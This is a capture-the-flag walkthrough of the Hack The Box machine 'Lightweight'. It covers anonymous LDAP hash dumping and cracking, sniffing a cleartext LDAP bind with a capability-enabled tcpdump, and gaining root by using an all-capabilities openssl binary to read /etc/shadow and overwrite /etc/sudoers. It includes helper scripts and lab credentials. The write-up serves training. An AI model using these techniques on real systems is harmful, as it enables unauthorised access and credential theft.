Linux Boxes

lightweight

  1. nmapAuto
    1. nmap vulns
  2. ldap
    1. ldapsearch with DC
      1. passwords
      2. $6$ hash mode
  3. http
    1. info.php
    2. status.php
    3. user.php
  4. ssh
    1. /etc/passwd
    2. LinEnum
      1. report
  5. wireshark
    1. tcpdump
    2. lightweight.ens33.cap
    3. refresh all the webpages and intercept LDAP packets
    4. privesc to ldapuser2
  6. privesc to ldapuser1
    1. 7z2John
    2. hashcat the 7z2john hash
    3. unzip 7z w/ pass
      1. status.php
    4. privesc
  7. privesc to root
    1. gtfo bins openssl
    2. testing openssl to view /etc/shadow
    3. privesc via sudoers config file
  8. user/root
  9. lessons learned

lightweight

images/1480-1.png
images/1480-2.png

nmapAuto

images/1481-1.png

images/1481-2.png

nmap vulns

images/1483-1.png

ldap

since the box is named Lightweight and the Lightweight Directory Access Protocol (LDAP) was found listening on it, let's enumerate that first. An anonymous (-x) base-scope query for namingContexts tells us what the directory is rooted at (-h/-p are the legacy host options; newer OpenLDAP clients want -H ldap://10.10.10.119 instead):

ldapsearch -h 10.10.10.119 -x -s base namingcontexts
images/1513-1.png

namingContexts gives us the base DN, dc=lightweight,dc=htb, and with that as the search base (-b) we can dump the whole tree anonymously
images/1513-2.png

ldapsearch with DC

ldapsearch -h 10.10.10.119 -x -b "dc=lightweight,dc=htb"
images/1482-1.png


images/1482-2.png

passwords

the userPassword values come back base64-encoded (the double colon after the attribute name, userPassword::, is how LDIF marks a base64 value). Decode them, strip the RFC 2307 {crypt} scheme tag, and put the bare $6$... strings in a hash file for hashcat.
Being able to read other users' password hashes with an anonymous bind is a misconfiguration in itself: userPassword should be readable only by the entry's owner and the directory admin.


ldapuser1: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2Roai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv

{crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/

ldapuser2: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdmszYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x

{crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1

$6$ hash mode

the $6$ prefix marks sha512crypt, which is hashcat mode 1800

images/1487-1.png

images/1487-2.png

images/1487-3.png

sha512crypt is deliberately slow (5000 rounds of SHA-512 per guess by default), so running rockyou against these two hashes would take our machine about 4 hours. Let's kick that off and look for other avenues to gain an initial foothold in the meantime.
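The decode-and-classify step above, written out as an added example (my code, not from the original notes): it unfolds ldapsearch's LDIF output (long values are wrapped onto continuation lines that start with a space, and userPassword is printed base64 after `::`), strips the RFC 2307 `{crypt}` scheme tag, maps the crypt(3) prefix to the hashcat mode, and groups `user:hash` lines per mode for `hashcat --username`. The LDIF sample is constructed around the two hashes above; the DNs and ou layout are assumed.

```python
import base64
import re

# Constructed sample of ldapsearch LDIF output. The two userPassword values are
# the ones dumped above; the dn/ou layout is assumed. Values that are not
# LDIF-safe are printed base64 after '::', and lines longer than 76 chars are
# folded onto continuation lines that start with a single space.
SAMPLE_LDIF = """\
# ldapuser1, People, lightweight.htb
dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
uid: ldapuser1
userPassword:: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2Ro
 ai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv

# ldapuser2, People, lightweight.htb
dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
uid: ldapuser2
userPassword:: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdmsz
 Ym9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x

# search result
search: 2
result: 0 Success
"""

# hashcat modes for the crypt(3) formats found behind an RFC 2307 {crypt} tag
CRYPT_MODES = [
    ("$6$", 1800, "sha512crypt"),
    ("$5$", 7400, "sha256crypt"),
    ("$1$", 500, "md5crypt"),
    ("$2a$", 3200, "bcrypt"), ("$2b$", 3200, "bcrypt"), ("$2y$", 3200, "bcrypt"),
]
# non-crypt LDAP schemes: hashcat wants these with the {TAG} kept
LDAP_SCHEME_MODES = {"SSHA": 111, "SHA": 101}


def unfold_ldif(text):
    """Join LDIF continuation lines (a leading space continues the previous line)."""
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]
        else:
            logical.append(raw)
    return logical


def parse_ldif(text):
    """Return [{attribute: [values]}], one dict per entry that has a dn.
    'attr:: value' is base64, 'attr: value' is literal."""
    entries, cur = [], {}
    for line in unfold_ldif(text) + [""]:
        if not line.strip():                      # blank line ends an entry
            if "dn" in cur:
                entries.append(cur)
            cur = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, rest = line.partition(":")
        if rest.startswith(":"):
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        else:
            value = rest.strip()
        cur.setdefault(attr, []).append(value)
    return entries


def identify(value):
    """Map one userPassword value to (string to give hashcat, mode, label)."""
    m = re.match(r"\{(\w+)\}(.*)", value, re.S)
    if not m:
        return value, None, "no scheme tag (cleartext?)"
    scheme, body = m.group(1).upper(), m.group(2)
    if scheme == "CRYPT":
        for prefix, mode, label in CRYPT_MODES:
            if body.startswith(prefix):
                return body, mode, label          # hashcat wants the bare $6$... string
        return body, None, "unknown crypt(3) format"
    if scheme in LDAP_SCHEME_MODES:
        return "{%s}%s" % (scheme, body), LDAP_SCHEME_MODES[scheme], scheme
    return value, None, "unknown scheme " + scheme


def extract_hashes(ldif_text):
    """Return [(uid, hash, mode, label)] for every entry carrying a userPassword."""
    rows = []
    for entry in parse_ldif(ldif_text):
        uid = entry.get("uid", entry["dn"])[0]
        for value in entry.get("userPassword", []):
            h, mode, label = identify(value)
            rows.append((uid, h, mode, label))
    return rows


def hashcat_files(ldif_text):
    """Group 'user:hash' lines by hashcat mode, one file's worth per mode."""
    by_mode = {}
    for uid, h, mode, _ in extract_hashes(ldif_text):
        by_mode.setdefault(mode, []).append(f"{uid}:{h}")
    return by_mode


if __name__ == "__main__":
    for mode, lines in hashcat_files(SAMPLE_LDIF).items():
        print(f"# hashcat -m {mode} --username hashes_{mode}.txt rockyou.txt")
        print("\n".join(lines))
```

Each group of lines goes into its own file and is cracked with `hashcat -m <mode> --username <file> rockyou.txt`; `--username` makes hashcat skip the `user:` prefix so cracked results stay tied to the account.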

http

images/1488-1.png

info.php

nothing too important here
images/1492-1.png

status.php

images/1491-1.png

user.php

images/1489-1.png


user.php says that visiting it automatically creates a local user on the box named after our IP address, and that we can SSH in as that user. Let's go log in.
images/1489-2.png

ssh

the password is the same as our IP
images/1490-1.png

we also see a couple of other IP-address users at the bottom, created the same way and most likely with passwords identical to their IPs; nothing else of interest here:
images/1490-2.png

/etc/passwd

let's check what other users exist on the box, since, as we have seen, user.php adds a user for any IP that browses to it

images/1493-1.png
images/1493-2.png

LinEnum

from here we can enumerate the box further with LinEnum since we have ssh access

images/1494-1.png

images/1494-2.png

images/1494-3.png

report

images/1495-1.png
images/1495-2.png

LinEnum reports file capabilities set on /usr/sbin/tcpdump. Capabilities are not "run as root": they grant a binary specific root-only privileges (here the networking ones a packet sniffer needs), so any user on the box can run tcpdump and capture traffic without being root.

a quick google gives this background on POSIX capabilities:
images/1495-3.png

wireshark

since tcpdump's capabilities let us capture packets on this machine, let's put them to use

we need an interface name for the tcpdump command; the networking section of our LinEnum report lists them, and since the web app talks to LDAP on the same host we want the loopback interface, 'lo':
images/1496-1.png

tcpdump

let's run a live tcpdump on the box over ssh and pipe the raw capture straight into a running wireshark on our attack machine:

ssh 10.10.14.62@10.10.10.119 "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -

where
/usr/sbin/tcpdump is the binary (the one carrying the file capabilities) we run through our ssh session
-i lo captures on the loopback interface, where the web app talks to LDAP
-U writes each packet out as soon as it is captured instead of buffering, so the live pipe keeps flowing
-s0 sets the snapshot length to 0, i.e. capture whole packets instead of truncating them (older tcpdump versions defaulted to 68/96 bytes; newer ones already capture full packets)
-w - writes the raw pcap to standard output, which is our ssh pipe
'not port 22' filters out our own ssh traffic so the capture does not feed back on itself

then we pipe the dump to wireshark
where
-k starts capturing immediately
-i - reads the capture from standard input (the pipe) instead of a local interface

images/1497-1.png

lightweight.ens33.cap

we're trying to find the traffic in which the web app creates accounts for new visitors in LDAP, and see exactly what credentials it uses to do so

wireshark starts empty at first, but refreshing user.php..
images/1498-1.png

..and pinging localhost on the box..
images/1498-2.png

images/1498-3.png
..show packets getting captured, so the pipeline works! Next step is to see what refreshing the other webpages does

refresh all the webpages and intercept LDAP packets

after refreshing all the webpages
(info.php, user.php, status.php and home.php)

status.php generates these packets to sift through:
images/1499-1.png


looking at the LDAP bindRequest we see a simple bind by ldapuser2 (status.php authenticates to LDAP as this user). A simple bind over plain LDAP on port 389 with no TLS sends the password as-is, so it sits right there in the packet:
credentials: 8bc8251332abe1d7f105d3e53ad39ac2
images/1499-2.png
images/1499-3.png

images/1499-4.png
images/1499-5.png
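What the bindRequest in the capture actually carries, as an added example of mine (not code from the original notes): a minimal BER encoder/decoder for the LDAP BindRequest of RFC 4511. It builds a simple bind the way status.php's LDAP client sends it over lo:389, then walks a constructed byte stream (that bind, an unrelated search, the server's bind response) and pulls out every cleartext password, which is exactly what Wireshark's `ldap.simple` field shows. The bind DN and the two extra messages are assumptions; the password is the one recovered above.

```python
# Minimal BER for the LDAP PDUs we care about (RFC 4511):
#   LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp CHOICE {...} }
#   BindRequest ::= [APPLICATION 0] SEQUENCE { version INTEGER, name LDAPDN,
#                     authentication CHOICE { simple [0] OCTET STRING, ... } }
# In a simple bind the password is a plain OCTET STRING, so without TLS anyone
# who can read the wire (or lo, as on this box) reads the password.
TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_ENUMERATED = 0x0A
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60    # [APPLICATION 0], constructed
TAG_BIND_RESPONSE = 0x61   # [APPLICATION 1]
TAG_SEARCH_REQUEST = 0x63  # [APPLICATION 3]
TAG_AUTH_SIMPLE = 0x80     # [0] context-specific, primitive


def ber_length(n):
    """Short form for n < 128, otherwise 0x80|len followed by big-endian length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, content):
    return bytes([tag]) + ber_length(len(content)) + content


def ber_integer(v):
    # two's-complement, minimal length; a leading 0x00 keeps large positives positive
    return tlv(TAG_INTEGER, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def build_simple_bind(msg_id, dn, password):
    """Encode an LDAPv3 simple BindRequest exactly as a client puts it on the wire."""
    bind = ber_integer(3) + tlv(TAG_OCTET_STRING, dn.encode()) + tlv(TAG_AUTH_SIMPLE, password.encode())
    return tlv(TAG_SEQUENCE, ber_integer(msg_id) + tlv(TAG_BIND_REQUEST, bind))


def read_tlv(buf, off):
    """Decode the TLV at buf[off:], returning (tag, content, offset after it)."""
    if off + 2 > len(buf):
        raise ValueError("truncated TLV")
    tag, first = buf[off], buf[off + 1]
    off += 2
    if first & 0x80:                      # long-form length
        n = first & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    else:
        length = first
    if off + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[off:off + length], off + length


def extract_simple_binds(stream):
    """Walk a raw LDAP byte stream (e.g. the reassembled client->server TCP
    payload) and return (messageID, bind DN, password) for every simple bind.
    Non-bind messages are skipped; a truncated trailing message ends the walk."""
    found, off = [], 0
    while off < len(stream):
        try:
            tag, msg, off = read_tlv(stream, off)
            if tag != TAG_SEQUENCE:
                break                             # not an LDAPMessage; desynced
            _, mid, pos = read_tlv(msg, 0)
            op_tag, op, _ = read_tlv(msg, pos)
            if op_tag != TAG_BIND_REQUEST:
                continue
            _, _, pos = read_tlv(op, 0)           # version
            _, dn, pos = read_tlv(op, pos)        # name (the bind DN)
            auth_tag, cred, _ = read_tlv(op, pos)
        except ValueError:
            break
        if auth_tag == TAG_AUTH_SIMPLE:           # a SASL bind ([3]) carries no cleartext here
            found.append((int.from_bytes(mid, "big", signed=True), dn.decode(), cred.decode()))
    return found


# Constructed stand-in for what tcpdump on lo hands Wireshark: the bind
# status.php performs (DN assumed), an unrelated search (body abbreviated),
# and the server's bind response.
SAMPLE_STREAM = (
    build_simple_bind(1, "uid=ldapuser2,ou=People,dc=lightweight,dc=htb",
                      "8bc8251332abe1d7f105d3e53ad39ac2")
    + tlv(TAG_SEQUENCE, ber_integer(2) + tlv(TAG_SEARCH_REQUEST,
                                              tlv(TAG_OCTET_STRING, b"dc=lightweight,dc=htb")))
    + tlv(TAG_SEQUENCE, ber_integer(1) + tlv(TAG_BIND_RESPONSE,
                                              tlv(TAG_ENUMERATED, b"\x00")      # resultCode success
                                              + tlv(TAG_OCTET_STRING, b"")
                                              + tlv(TAG_OCTET_STRING, b"")))
)


def demo():
    return extract_simple_binds(SAMPLE_STREAM)


if __name__ == "__main__":
    for mid, dn, pw in demo():
        print(f"msg {mid}: {dn} -> {pw}")
```

On a real capture file the same thing comes out of the dissector with `tshark -r lightweight.cap -Y ldap.simple -T fields -e ldap.name -e ldap.simple`; the block shows what that dissector is doing and why the fix is LDAPS/STARTTLS (or at least a SASL mechanism that does not ship the password), not a longer password.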

privesc to ldapuser2

let's see if we can use these creds to elevate our privileges on the box
(ssh as ldapuser2 with this password does NOT work, but su from our IP-user shell DOES)

pw:8bc8251332abe1d7f105d3e53ad39ac2
images/1500-1.png

privesc to ldapuser1

checking out the contents of ldapuser2's home directory we see our user.txt flag as well as a peculiar 7zip file (backup.7z); let's copy it to our attack machine and extract it there

images/1484-1.png

7za is the standalone p7zip binary that can compress and decompress 7zip archives
where
x extracts the archive contents with their full paths
images/1484-2.png

the archive is password protected; luckily 7z2john can turn it into a hash we can brute-force offline

7z2John

if you do not have jumbo john (which ships 7z2john.pl in its run/ directory) you can git clone it from here
images/1503-1.png


./7z2john.pl <file>
images/1503-2.png

the output is <filename>:$7z$...; copy the hash string after the first colon (everything from $7z$ onward, without the filename) into a hash file. hashcat's mode for 7-Zip archives is 11600

hashcat the 7z2john hash

images/1504-1.png

images/1504-2.png

images/1504-3.png

password to extract files from the 7z is delete

unzip 7z w/ pass

7z e backup.7z
with password: delete
images/1505-1.png

status.php

looking at the php here we see there are credentials to ldapuser1 in plaintext

f3ca9d298a553da117442deeb6fa932d
images/1506-1.png

privesc

using the credentials for ldapuser1 exposed in the status.php file, we elevate our privileges!
pw: f3ca9d298a553da117442deeb6fa932d

images/1507-1.png

privesc to root

running
getcap *
images/1508-1.png

the openssl binary there shows up as =ep. In capability text syntax a clause with no capability names in front of the = means ALL capabilities, and ep puts them in the effective and permitted sets. So an empty name list followed by =ep is not "no capabilities", it is every capability, including cap_dac_override and cap_dac_read_search, which let the binary read and write any file regardless of its permissions.


looking at the capabilities man page:
images/1508-2.png
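Reading getcap output precisely, as an added example (mine, not from the notes) that also covers the tcpdump finding from the LinEnum report: it implements the cap_from_text(3) clause syntax (`=` sets, `+` adds, `-` removes the e/p/i flags; a clause with no capability names means every capability), accepts both the old `path = clauses` and the newer `path clauses` getcap layouts, and flags what an unprivileged user can do with each binary. The sample output is constructed around the two binaries on this box plus two assumed extra lines.

```python
import re

ALL = "*"   # stands for every capability: the empty name list in cap_from_text syntax

# Effective capabilities that usually hand an unprivileged user a root path.
DANGEROUS = {
    "cap_dac_override": "bypass write permission checks on any file",
    "cap_dac_read_search": "bypass read permission checks on any file",
    "cap_setuid": "setuid(0)",
    "cap_setgid": "setgid to any group",
    "cap_sys_admin": "mounts and most kernel admin operations",
    "cap_sys_ptrace": "attach to any process",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "chown any file",
    "cap_fowner": "bypass ownership checks (chmod etc.)",
    "cap_net_raw": "raw sockets, packet capture",
    "cap_net_admin": "interface/routing config, promiscuous mode",
}


def parse_cap_text(text):
    """cap_from_text(3): whitespace-separated clauses 'names<op><flags>...';
    names is a comma list or empty (= ALL), op is '=' (set exactly), '+' (add)
    or '-' (remove), flags are a subset of e/p/i. Returns {name_or_ALL: set(flags)};
    a specific name overrides the ALL baseline."""
    caps = {}
    for clause in text.split():
        m = re.fullmatch(r"([a-z0-9_,]*)((?:[=+\-][eip]*)+)", clause)
        if not m:
            raise ValueError(f"bad capability clause {clause!r}")
        names = [n for n in m.group(1).split(",") if n] or [ALL]
        for op, flags in re.findall(r"([=+\-])([eip]*)", m.group(2)):
            flags = set(flags)
            for name in names:
                if name == ALL and op == "=":
                    caps = {ALL: set(flags)}          # a lone '=' clears everything
                elif name == ALL:
                    for k in set(caps) | {ALL}:
                        cur = caps.get(k, caps.get(ALL, set()))
                        caps[k] = cur | flags if op == "+" else cur - flags
                elif op == "=":
                    caps[name] = set(flags)
                else:
                    cur = caps.get(name, caps.get(ALL, set()))
                    caps[name] = cur | flags if op == "+" else cur - flags
    return caps


def flags_of(caps, name):
    return caps.get(name, caps.get(ALL, set()))


def parse_getcap(output):
    """Parse getcap lines in the old 'path = clauses' / 'path =ep' layout and
    the newer 'path clauses' layout. Returns {path: caps}."""
    result = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, text = line.partition(" ")
        result[path] = parse_cap_text(text)
    return result


def assess(caps):
    """Findings for one binary. Only effective (e) caps act for a program that
    never raises capabilities itself; permitted-only (p) needs its cooperation."""
    if {"e", "p"} <= flags_of(caps, ALL):
        return ["ALL capabilities effective (=ep): root-equivalent file read/write, e.g. /etc/shadow, /etc/sudoers"]
    findings = []
    for name, why in DANGEROUS.items():
        f = flags_of(caps, name)
        if {"e", "p"} <= f:
            findings.append(f"{name}+ep: {why}")
        elif "p" in f:
            findings.append(f"{name}+p (permitted only): {why}, if the program raises it")
    return findings


def report(output):
    return {path: assess(caps) for path, caps in parse_getcap(output).items()}


# Constructed getcap output: the two binaries found on this box (old libcap
# layout, as getcap printed them) plus two assumed lines, one in the newer
# layout and one with a permitted-only capability.
GETCAP_OUTPUT = """\
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep
/usr/bin/python3 cap_setuid=ep
/usr/bin/ping = cap_net_raw+p
"""

if __name__ == "__main__":
    for path, findings in report(GETCAP_OUTPUT).items():
        print(path)
        for f in findings or ["nothing notable"]:
            print("   ", f)
```

Run it over `getcap -r / 2>/dev/null` on a target; the ALL check is what turns `=ep` from "looks empty" into "this binary ignores file permissions", and the permitted-only branch is why a `+p` entry (as on ping) is not the same finding as `+ep`.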


gtfo bins openssl

images/1509-1.png



and sudo:

images/1509-2.png

testing openssl to view /etc/shadow

running openssl without an absolute path runs the one from /usr/bin on our PATH, which is NOT the copy carrying the =ep capabilities

images/1510-1.png

however if we run the openssl binary located within /home/ldapuser1, enc with no cipher given simply copies its input to its output, and with every capability effective the kernel's permission checks no longer apply to it, so it reads root-only files:
/home/ldapuser1/openssl enc -in /etc/shadow
images/1510-2.png
images/1510-3.png

privesc via sudoers config file

images/1511-1.png
so the plan: read /etc/sudoers out with the privileged openssl, add a rule to our copy in ldapuser1's home directory giving ldapuser1 the same full sudo rights root has, write the copy back over /etc/sudoers with the privileged openssl, and sudo to root from there

first print out the contents of our /etc/sudoers file
./openssl enc -in /etc/sudoers
images/1511-2.png
and copy it to a file in our ldapuser1 directory:
images/1511-3.png

images/1511-4.png

vi ./sudoers (the copy; we cannot open /etc/sudoers for writing with vi) - we want to give ldapuser1 the same rule root has, ldapuser1 ALL=(ALL) ALL. Keep the edit to that one line: sudo refuses to run anything at all if the file has a syntax error
images/1511-5.png
which looks like this:
images/1511-6.png

now cat our edited copy and have the privileged openssl write it back over /etc/sudoers (enc -out with no cipher is a plain copy, and with every capability effective the 0440 root-owned mode is no obstacle)
cat ./sudoers | ./openssl enc -out /etc/sudoers
images/1511-7.png

now simply elevate to root with ldapuser1's newly configured permissions and..
Note: if sudo still refuses, read the file back with ./openssl enc -in /etc/sudoers to confirm the new line landed; you may also need to exit ldapuser1's session and su again before the change takes effect!
images/1511-8.png

sudo su -
we're root!
images/1511-9.png

user/root

images/1485-1.png
8a866d3bb7e13a57aaeb110297f48026


images/1485-2.png
f1d4e309c5a6b3fffff74a8f4b2135fa

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1501-1.png